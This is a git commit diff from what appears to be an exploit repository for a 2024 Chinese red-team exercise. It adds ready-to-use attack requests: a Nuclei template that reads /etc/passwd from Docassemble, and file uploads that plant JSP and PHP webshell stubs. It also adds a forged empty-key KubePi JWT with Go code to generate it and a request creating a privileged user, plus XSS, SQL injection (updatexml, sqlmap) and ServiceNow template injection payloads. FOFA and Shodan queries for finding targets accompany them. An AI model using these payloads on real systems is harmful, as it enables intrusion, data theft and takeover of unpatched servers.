add

2024-08-06 17:56:12 +08:00
parent 143025cfb6
commit dca4284a49
62 changed files with 1250 additions and 54 deletions
--- a/Docassemble任意文件读取漏洞(CVE-2024-27292).md
+++ b/Docassemble任意文件读取漏洞(CVE-2024-27292).md
@@ -0,0 +1,51 @@
+## fofa
+
+```
+icon_hash="-575790689"
+```
+
+## poc
+
+```
+id: CVE-2024-27292
+
+info:
+name:Docassemble-LocalFileInclusion
+author:johnk3r
+severity:high
+description:|
+    Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
+reference:
+-https://tantosec.com/blog/docassemble/
+-https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
+-https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
+classification:
+cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+cvss-score:7.5
+cve-id:CVE-2024-27292
+cwe-id:CWE-706
+epss-score:0.00043
+epss-percentile:0.0866
+metadata:
+verified:true
+max-request:1
+shodan-query:http.title:"docassemble"
+fofa-query:icon_hash="-575790689"
+tags:cve,cve2024,docassemble,lfi
+
+http:
+-method:GET
+path:
+-"{{BaseURL}}/interview?i=/etc/passwd"
+
+matchers-condition:and
+matchers:
+-type:regex
+regex:
+-"root:.*:0:0:"
+
+-type:status
+status:
+- 501
+```
+
--- a/H3C-CVM-upload接口前台任意文件上传漏洞.md
+++ b/H3C-CVM-upload接口前台任意文件上传漏洞.md
@@ -9,3 +9,26 @@ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
 <%out.println("test");%>
 ```

+
+
+```
+POST /cas/fileUpload/fd HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
+Content-Length: 217
+
+--a4d7586ac9d50625dee11e86fa69bc71
+Content-Disposition: form-data; name="token"
+
+/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/stc11.jsp
+--a4d7586ac9d50625dee11e86fa69bc71
+Content-Disposition: form-data; name="file"; filename="123.jsp"
+Content-Type: image/png
+
+<% out.println("215882935");%>  
+--a4d7586ac9d50625dee11e86fa69bc71--
+```
+
--- a/IP网络广播服务平台存在任意文件上传漏洞.md
+++ b/IP网络广播服务平台存在任意文件上传漏洞.md
@@ -0,0 +1,25 @@
+Fofa:icon_hash="-568806419"
+
+```
+POST /api/v2/remote-upgrade/upload HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 197
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytiZYyyKkbwCxtHC1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: http://127.0.0.1/api/v2/remote-upgrade/upload
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Connection: close
+
+------WebKitFormBoundarytiZYyyKkbwCxtHC1
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+------WebKitFormBoundarytiZYyyKkbwCxtHC1--
+```
+
--- a/JeecgBoot反射型XSS漏洞.md
+++ b/JeecgBoot反射型XSS漏洞.md
@@ -0,0 +1,6 @@
+```
+GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (Macintosh; Intel MacOS X 10.15; rv:126.0) Gecko/20100101Firefox/126.0
+```
+
--- a/JeecgBoot积木报表存在SQL注入.md
+++ b/JeecgBoot积木报表存在SQL注入.md
@@ -0,0 +1,15 @@
+```
+POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
+User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/json
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 192.168.131.100:8088
+Content-Length: 21
+
+{"sql":"select '1' "}
+```
+
--- a/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png
+++ b/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png
--- a/KubePi存在JWT验证绕过漏洞.md
+++ b/KubePi存在JWT验证绕过漏洞.md
@@ -0,0 +1,90 @@
+fofa
+
+```
+"kubepi"
+```
+
+使用空密钥生成jwt token
+
+```
+eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
+```
+
+使用生成的密钥创建用户tang
+
+```
+POST /kubepi/api/v1/users HTTP/1.1
+Host: 127.0.0.1:9982
+Content-Length: 248
+sec-ch-ua: 
+Accept: application/json, text/plain, */*
+lang: zh-CN
+Content-Type: application/json
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://127.0.0.1:9982
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:9982/kubepi/user-management/users/create
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
+Connection: close
+
+{"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"tang@qq.com","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}}
+```
+
+![image-20240806095638556](KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png)
+
+生成jwt 程序
+
+```
+package main
+
+import(
+"fmt"
+"github.com/kataras/iris/v12/middleware/jwt"
+"time"
+)
+
+var jwtMaxAge =100000* time.Minute
+
+typeUserProfilestruct{
+Namestring`json:"name"`
+NickNamestring`json:"nickName"`
+Emailstring`json:"email"`
+Languagestring`json:"language"`
+ResourcePermissionsmap[string][]string`json:"resourcePermissions"`
+IsAdministratorbool`json:"isAdministrator"`
+MfaMfa`json:"mfa"`
+}
+
+typeMfastruct{
+Enablebool`json:"enable"`
+Secretstring`json:"secret"`
+Approvedbool`json:"approved"`
+}
+
+func main(){
+    jwtSigner := jwt.NewSigner(jwt.HS256,"", jwtMaxAge)
+    test :=map[string][]string{}
+    profile :=UserProfile{
+Name:"admin",
+NickName:"Administrator",
+Email:"support@fit2cloud.com",
+Language:"zh-CN",
+ResourcePermissions: test,
+IsAdministrator:true,
+Mfa:Mfa{
+Secret:"",
+Enable:false,
+Approved:false,
+},
+}
+    nonejwt, _ := jwtSigner.Sign(profile)
+    fmt.Println(string(nonejwt))
+}
+```
+
--- a/注入漏洞.md
+++ b/注入漏洞.md
@@ -0,0 +1,21 @@
+ FOFA：body="Maintain/cloud_index.php"
+
+```
+
+GET /Maintain/sprog_upstatus.php?status=1&rdb=1&id=1%20and%20updatexml(1,concat(0x7e,version(),0x7e),1) HTTP/1.1
+Host: 127.0.0.1
+Connection: keep-alive
+sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+sec-ch-ua-platform: "Windows"
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9
+
+```
+
--- a/Quicklancer存在SQL注入漏洞.md
+++ b/Quicklancer存在SQL注入漏洞.md
@@ -0,0 +1,12 @@
+```
+GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1&salary-type=1&sort=id&subcat= HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+
+
+python3 sqlmap.py -r test.txt -p range2 --dbms=mysql --current-db --current-user --batch
+```
+
--- a/README.md
+++ b/README.md
@@ -1,9 +1,11 @@
 # 2024Hvv
 2024 HVV情报速递~

-
-| 漏洞名称                                  |
+| 漏洞名称                                                     |
 | ------------------------------------------------------------ |
+| DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞 |
+| 1Panel  远程代码执行漏洞(XVE-2024-17699)                     |
+| 1Panel面板最新前台RCE漏洞                                    |
 | 29网课交单平台epay.php存在SQL注入漏洞                        |
 | 360 新天擎终端安全管理系统存在信息泄露漏洞                   |
 | 360天擎 - sql注入                                            |
@@ -17,67 +19,105 @@
 | APP分发签名系统index-uplog.php存在任意文件上传漏洞           |
 | Array VPN任意文件读取漏洞                                    |
 | Bazarr swaggerui任意文件读取漏洞                             |
-| Bazarr swaggerui组件目录穿越导致任意文件读取漏洞             |
+| Bazarr  swaggerui组件目录穿越导致任意文件读取漏洞            |
 | Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)          |
 | Confluence远程命令执行漏洞(CVE-2024-21683)                   |
 | Coremail邮件系统未授权访问获取管理员账密                     |
-| DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞 |
 | DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞       |
 | D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞（CVE-2024-33113） |
+| Docassemble任意文件读取漏洞(CVE-2024-27292)                  |
+| eking管理易FileUpload接口存在任意文件上传漏洞                |
 | F5 BIG-IP 远程代码执行漏洞                                   |
 | F-logic DataCube3存在命令执行漏洞                            |
 | fogproject系统接口export.php存在远程命令执行漏洞             |
 | H3C Magic B1STV100R012 RCE                                   |
-| H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180)         |
-| H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞 |
+| H3C Workspace 云桌面  远程命令执行漏洞(XVE-2024-8180)        |
+| H3C 用户自助服务平台  dynamiccontent.properties.xhtml存在RCE漏洞 |
 | H3C-CVM-upload接口前台任意文件上传漏洞                       |
 | H3C-SecParh堡垒机任意用户登录漏洞                            |
 | H3C密码泄露漏洞                                              |
 | H3C网络管理系统任意文件读取漏洞                              |
 | H3C-校园网自助服务系统flexfileupload任意文件上传漏洞         |
+| IP网络广播服务平台存在任意文件上传漏洞                       |
 | JeePlus快速开发平台resetpassword存在SQL注入漏洞              |
 | Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793           |
+| KubePi存在JWT验证绕过漏洞                                    |
 | LiveNVR流媒体服务软件存在未授权访问漏洞                      |
 | Netgear-WN604接口downloadFile.php信息泄露漏洞                |
+| Panalog 日志审计系统 SQL 注入漏洞                            |
 | RAISECOM网关设备list_base_config.php存在远程命令执行漏洞     |
-| README                                                       |
+| ServiceNowUI Macros  CVE-2024-4879 模板注入漏洞              |
 | Sharp 多功能打印机未授权访问漏洞                             |
-| SuiteCRM responseEntryPoint存在SQL注入漏洞                   |
+| SuiteCRM  responseEntryPoint存在SQL注入漏洞                  |
 | T18-1TOTOLINK-A6000R-RCE                                     |
-| Tenda 03 代码执行漏洞(CVE-2024-6963)                         |
+| Tenda 03  代码执行漏洞(CVE-2024-6963)                        |
+| Quicklancer存在SQL注入漏洞                                   |
+| Tenda FH1201  v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473) |
+| Tenda FH1201  v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468) |
+| panabit日志审计系统sprog_upstatus存在SQL注入漏洞             |
+| SpringBlade系统menu接口存在SQL注入漏洞                       |
+| JeecgBoot反射型XSS漏洞                                       |
+| 方天云智慧平台系统 GetCustomerLinkman  SQL注入漏洞           |
+| 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞                  |
+| 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞             |
+| 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞             |
+| 用友U9系统DoQuery接口存在SQL注入                             |
+| 泛微ecology系统setup接口存在信息泄露漏洞                     |
+| 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞 |
+| 蓝凌EIS智慧协同平台doc_fileedit_word.aspx  SQL注入           |
+| 蓝凌EIS智慧协同平台UniformEntry.aspx  SQL注入                |
+| 蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx  SQL注入   |
+| 蓝凌EIS智慧协同平台ShowUserInfo.aspx  SQL注入                |
+| 用友U8 Cloud linkntb存在SQL注入漏洞                          |
+| Untitled                                                     |
+| 因酷教育平台RCE(CVE-2024-35570)                              |
+| 浪潮GS企业管理软件多处  .NET反序列化RCE漏洞poc2              |
+| 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014) |
+| 泛微HrmService存在SQL注入漏洞                                |
+| 任我行协同CRM反序列化漏洞                                    |
+| 泛微云桥文件上传                                             |
 | WVP视频平台(国标28181)未授权SQL注入漏洞                      |
 | 安恒明御安全网关rce                                          |
 | 安恒明御安全网关远程命令执行漏洞                             |
 | 安恒-下一代防火墙-RCE                                        |
 | 百易云资产管理运营系统任意文件上传                           |
 | 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞      |
+| 喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞        |
+| 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞       |
+| 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞        |
+| 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞            |
 | 禅道研发项⽬管理系统未授权                                   |
 | 超级猫签名APP分发平台前台存在SQL注入漏洞                     |
 | 超级猫签名APP分发平台前台远程文件写入漏洞                    |
+| 创客13星零售商城系统RCE                                      |
 | 创客13星零售商城系统前台任意文件上传漏洞                     |
 | 电信网关 ipping.php 命令执行漏洞                             |
-| 帆软FineReport报表 ReportServer SQL注入getshell              |
+| 帆软FineReport报表 ReportServer  SQL注入getshell             |
 | 帆软报表 channel 远程命令执行漏洞                            |
 | 帆软未授权命令执行                                           |
-| 泛微 e-cology9 servicesWorkPlanService 前台SQL注入           |
-| 泛微E-cology9 browserjsp SQL注入漏洞                         |
+| 泛微 e-cology9  servicesWorkPlanService 前台SQL注入          |
+| 泛微E-cology9 browserjsp  SQL注入漏洞                        |
 | 泛微e-cology9 存在SSRF漏洞                                   |
-| 泛微E-Mobile installOperate.do SSRF漏洞                      |
-| 泛微E-office-10接口leave_record.php SQL注入漏洞              |
+| 泛微E-Mobile installOperate.do  SSRF漏洞                     |
+| 泛微E-office-10接口leave_record.php  SQL注入漏洞             |
 | 泛微OA E-Cology存在SQL注入漏洞                               |
-| 泛微OA E-Office V10 OfficeServer 任意文件上传                |
+| 泛微OA E-Office V10  OfficeServer 任意文件上传               |
+| 方天云智慧平台系统文件上传                                   |
 | 飞企互联loginService任意登录                                 |
 | 飞讯云MyImportData前台SQL注入                                |
-| 飞讯云WMS MyDownMylmportData 前台SQL注入                     |
-| 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞  |
-| 福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞  |
+| 飞讯云WMS MyDownMylmportData  前台SQL注入                    |
+| 福建科立讯通信 指挥调度管理平台  ajax_users.php SQL 注入漏洞 |
+| 福建科立讯通信 指挥调度管理平台  ajax_users.php 信息泄露漏洞 |
 | 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞          |
-| 广联达Linkworks ArchiveWebService XML实体注入漏洞            |
+| 福建科立讯通信指挥调度管理平台任意文件上传                   |
+| 广联达Linkworks  ArchiveWebService XML实体注入漏洞           |
 | 广联达-Linkworks-GetAllData接口存在未授权访问                |
 | 广联达OA接口ArchiveWebService存在XML实体注入漏洞             |
 | 广州图创-图书馆集群管理系统-PermissionAC                     |
 | 海康威视教育综合安防管理系统admintoken泄露                   |
+| 海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞  |
 | 海康威视综合安防管理平台前台RCE                              |
+| 海康卫视综合安防  uploadAllPackage任意文件上传               |
 | 海洋CMS后台admin_smtp.php存在远程代码执行漏洞                |
 | 好视通视频会议系统存在任意文件读取漏洞                       |
 | 红海云eHR kqFile.mob 任意文件上传                            |
@@ -85,15 +125,17 @@
 | 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞 |
 | 宏脉医疗DownLoadServerFile任意文件读取下载漏洞               |
 | 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞   |
-| 湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞 |
+| 湖南众合百易信息技术有限公司 资产管理运营系统  comfileup.php 前台文件上传漏洞 |
 | 华磊科技物流getOrderTrackingNumber存在sql注入漏洞            |
 | 华磊科技物流modifyInsurance sql注入漏洞                      |
 | 华天动力-OA-downloadWpsFile任意文件读取                      |
-| 汇智ERP filehandle.aspx 任意文件读取漏洞                     |
+| 汇智ERP filehandle.aspx  任意文件读取漏洞                    |
+| JeecgBoot积木报表存在SQL注入                                 |
+| 建文工程管理系统 download2 文件读取漏洞                      |
 | 建文工程管理系统desktop.ashx存在SQL注入漏洞                  |
 | 建文工程项目管理软件BusinessManger存在SQL注入漏洞            |
 | 捷诚管理信息系统 SQL注入漏洞                                 |
-| 金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞              |
+| 金和 OA C6  GeneralXmlhttpPage.aspx SQL 注入漏洞             |
 | 金和OA jc6 clobfield SQL注入漏洞                             |
 | 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞          |
 | 金和OA_CarCardInfo.aspx_SQL注入漏洞                          |
@@ -114,33 +156,40 @@
 | 九思-OA-任意文件上传                                         |
 | 科荣 AIO 管理系统任意文件读取                                |
 | 科荣AIO moffice SQL注入漏洞                                  |
+| 科荣AIO系统UtilServlet存在任意命令执行漏洞                   |
 | 科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞        |
-| 科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞     |
-| 科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞           |
+| 科讯校园一卡通管理系统  dormitoryHealthRankingSQL注入漏洞    |
+| 科讯校园一卡通管理系统 get_kq_tj_today  SQL注入漏洞          |
 | 蓝凌 EKP 远程代码执行漏洞                                    |
+| 蓝凌EIS智慧协同平台frm_button_func.aspx  SQL注入             |
+| 蓝凌EIS智慧协同平台frm_form_list_main.aspx  SQL注入          |
 | 蓝凌EKP存在sys_ui_component远程命令执行漏洞                  |
-| 浪潮云财务系统 bizintegrationwebservice.asmx 命令执行        |
+| 浪潮云财务系统  bizintegrationwebservice.asmx 命令执行       |
 | 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞                   |
 | 联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞                 |
 | 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞 |
 | 猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞                |
 | 绿盟 SAS堡垒机 Exec 远程命令执行漏洞                         |
 | 迈普-多业务融合网关-信息泄露                                 |
+| 满客宝智慧食堂系统 downloadWebFile  任意文件读取漏洞         |
 | 明源云ERP接口ApiUpdate.ashx文件上传漏洞                      |
+| 铭飞MCMS 远程代码执行漏洞                                    |
+| 魔方网表 mailupdate.jsp 接口 任意文件上传                    |
 | 启明星辰 天玥网络安全审计系统 SQL 注入漏洞                   |
 | 启明星辰-天清汉马VPN接口download任意文件读取                 |
 | 全息AI网络运维平台存在命令执行漏洞                           |
 | 锐捷EG350易网关管理系统存在信息泄露漏洞                      |
+| 锐捷-EG易网关存在RCE漏洞                                     |
 | 锐捷M18000-WS-ED无线控制器存在CRL命令注入                    |
 | 锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞     |
-| 锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞       |
-| 锐捷统一上网行为管理与审计系统 static_convert.php 命令执行   |
+| 锐捷RG-NBS2026G-P交换机WEB管理  ping.htm 未授权访问漏洞      |
+| 锐捷统一上网行为管理与审计系统  static_convert.php 命令执行  |
 | 瑞斯康达多业务智能网关RCE                                    |
 | 瑞斯康达-多业务智能网关-RCE                                  |
-| 润乾报表dataSphereServlet 任意文件上传漏洞                   |
-| 润乾报表dataSphereServlet接口 任意文件读取漏洞               |
+| 润乾报表dataSphereServlet  任意文件上传漏洞                  |
+| 润乾报表dataSphereServlet接口  任意文件读取漏洞              |
 | 润乾报表InputServlet存在任意文件上传漏洞                     |
-| 赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞            |
+| 赛蓝企业管理系统 DownloadBuilder  任意文件读取漏洞           |
 | 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞                |
 | 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞               |
 | 山石网科云鉴存在前台任意命令执行漏洞                         |
@@ -151,58 +200,60 @@
 | 数字通指尖云平台-智慧政务payslip SQL注入漏洞                 |
 | 拓尔思-TRSWAS5.0-PermissionAC文件上传                        |
 | 拓尔思TRS媒资管理系统任意文件上传                            |
-| 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞   |
+| 天问物业 ERP 系统  AreaAvatarDownLoad.aspx 任意文件读取漏洞  |
 | 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞          |
 | 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞       |
 | 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞    |
 | 天玥网络安全审计系统 SQL 注入漏洞                            |
 | 通达OA V11.10 login.php SQL注入漏洞                          |
-| 通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞      |
-| 同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞 |
+| 通天星 CMSV6 车载视频监控平台 disable 存在  SQL 注入漏洞     |
+| 同享TXEHR  V15人力管理管理平台DownloadFile存在任意文件下载漏洞 |
 | 万户ezoffice wpsservlet任意文件上传                          |
 | 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞                |
+| 万户ezOFFICE协同管理平台 getAutoCode  SQL注入漏洞            |
 | 万户OA SQL注入漏洞                                           |
-| 万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞  |
+| 万户协同办公平台ezoffice  DocumentEdit_unite.jsp SQL注入漏洞 |
 | 网康 NS-ASG sql 注入漏洞                                     |
 | 网康 NS-ASG 信息泄露漏洞                                     |
 | 网神SecSSL3600安全接入网关系统任意密码修改漏洞               |
-| 微信公众平台-无限回调系统 -SQL注入                           |
 | 微信公众平台-无限回调系统-SQL注入                            |
 | 西软云XMS-futurehoteloperate接口存在XXE漏洞                  |
 | 小学智慧校园信息管理系统 Upload 文件上传漏洞                 |
-| 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞    |
+| 亿赛通数据泄露防护(DLP)系统  NetSecConfigAjax SQL 注入漏洞   |
 | 亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞     |
-| 易宝OA ExecuteSqlForSingle SQL注入漏洞                       |
+| 易宝OA ExecuteSqlForSingle  SQL注入漏洞                      |
 | 易宝OA 存在BasicService存在任意文件上传漏洞                  |
 | 用友 NC Cloud jsinvoke 任意文件上传                          |
-| 用友 U8 cloud MonitorServlet 反序列化漏洞                    |
-| 用友 UAP querygoodsgridbycode SQL 注入                       |
+| 用友 U8 cloud MonitorServlet  反序列化漏洞                   |
+| 用友 UAP querygoodsgridbycode  SQL 注入                      |
 | 用友-CRM客户关系管理系统-任意文件上传                        |
-| 用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞 |
+| 用友GRPA++Cloud 政府财务云  selectGlaDatasourcePreview SQL注入漏洞 |
+| 用友NC Cloud queryStaffByName  SQL注入漏洞                   |
 | 用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞   |
 | 用友NC-UserAuthenticationServlet存在反序列化漏洞             |
-| 用友NC及U8cloud LoggingConfigServlet 反序列化漏洞            |
+| 用友NC及U8cloud  LoggingConfigServlet 反序列化漏洞           |
 | 用友NC任意文件读取                                           |
-| 用友U8 Cloud ActionServlet SQL注入漏洞                       |
-| 用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞             |
+| 用友U8 Cloud ActionServlet  SQL注入漏洞                      |
+| 用友U8 Cloud  MeasureQueryFrameAction SQL注入漏洞            |
 | 用友U8 CRM import.php 文件上传漏洞                           |
-| 用友u8-cloud RegisterServlet SQL注入                         |
+| 用友u8-cloud RegisterServlet  SQL注入                        |
 | 用友-U8-Cloud-文件上传                                       |
 | 用友U9-UMWebService.asmx存在文件读取漏洞                     |
 | 用友-畅捷通CRM-任意文件上传                                  |
 | 用友时空KSOA PreviewKPQT SQL注入漏洞                         |
+| 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞                |
+| 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞               |
+| 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞             |
 | 云课网校系统uploadImage存在任意文件上传漏洞                  |
 | 云时空商业ERP文件上传                                        |
+| 甄云 SRM 云平台 SpEL 表达式注入漏洞                          |
+| 证书查询系统存在任意文件读取漏洞                             |
 | 指尖云平台-智慧政务payslip SQL注入漏洞                       |
-| 致远 OA fileUpload.do 前台文件上传绕过漏洞                   |
-| 致远AnalyticsCloud 分析云存在任意文件读取漏洞                |
+| 致远 OA fileUpload.do  前台文件上传绕过漏洞                  |
+| 致远AnalyticsCloud  分析云存在任意文件读取漏洞               |
 | 致远constDef接囗存在代码执行漏洞                             |
+| 致远互联FE协作办公平台apprvaddNew存在SQL注入                 |
 | 致远互联-M1移动协同办公管理软件-RCE                          |
 | 竹云 信息泄露                                                |
 | 资管云--任意文件上传                                         |
 | 紫光-电子档案管理系统-PermissionAC                           |
-| 电信网关 ipping.php 命令执行漏洞.assets                      |
-| 小学智慧校园信息管理系统 Upload 文件上传漏洞.assets          |
-| 易宝OA 存在BasicService存在任意文件上传漏洞.assets           |
-| .gitattributes                                               |
-| 1Panel 远程代码执行漏洞(XVE-2024-17699)                      |
--- a/模板注入漏洞.md
+++ b/模板注入漏洞.md
@@ -0,0 +1,9 @@
+icon_hash="1701804003" || title="servicenow"
+
+```
+GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(999*999);</g:evaluate></j:jelly></style> HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+```
+
--- a/SpringBlade系统menu接口存在SQL注入漏洞.md
+++ b/SpringBlade系统menu接口存在SQL注入漏洞.md
@@ -0,0 +1,8 @@
+```
+GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
